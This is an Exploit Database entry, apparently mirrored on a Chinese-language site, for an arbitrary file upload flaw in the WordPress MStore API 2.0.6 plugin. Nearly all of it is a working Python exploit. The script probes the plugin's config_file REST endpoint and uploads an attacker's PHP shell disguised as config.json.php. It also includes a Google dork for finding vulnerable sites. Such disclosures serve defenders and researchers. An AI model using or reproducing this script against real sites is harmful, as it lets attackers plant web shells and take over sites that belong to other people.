WordPress Plugin MStore API 2.0.6 – Arbitrary File Upload

• Exploit Database
• 12 阅读

• 作者： spacehen
  日期： 2021-10-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50379/

• # Exploit Title: WordPress Plugin MStore API 2.0.6 - Arbitrary File Upload
  # Google Dork: inurl:/wp-content/plugins/mstore-api/
  # Date: 22/09/2021
  # Exploit Author: spacehen
  # Vendor Homepage: https://wordpress.org/plugins/mstore-api/
  # Version: 2.0.6, possibly higher
  # Tested on: Ubuntu 20.04.1
  
  import os.path
  from os import path
  import json
  import requests;
  import sys
  
  def print_banner():
  	print("MStore API < 2.0.6 - Arbitrary File Upload")
  	print("Author -> space_hen (www.github.com/spacehen)")
  	
  def print_usage():
  	print("Usage: python3 exploit.py [target url] [shell path]")
  	print("Ex: python3 exploit.py https://example.com ./shell.php")
  
  def vuln_check(uri):
  	response = requests.post(uri)
  	raw = response.text
  
  	if ("Key must be" in raw):
  		return True;
  	else:
  		return False;
  
  def main():
  
  	print_banner()
  	if(len(sys.argv) != 3):
  		print_usage();
  		sys.exit(1);
  
  	base = sys.argv[1]
  	file_path = sys.argv[2]
  
  	rest_url = '/wp-json/api/flutter_woo/config_file'
  
  	uri = base + rest_url;
  	check = vuln_check(uri);
  
  	if(check == False):
  		print("(*) Target not vulnerable!");
  		sys.exit(1)
  
  	if( path.isfile(file_path) == False):
  		print("(*) Invalid file!")
  		sys.exit(1)
  
  	files = {'file' : ( "config.json.php", open(file_path), "application/json" )}
  
  	print("Uploading shell...");
  	response = requests.post(uri, files=files )
  	# response should be location of file
  	print(response.text)
  
  main();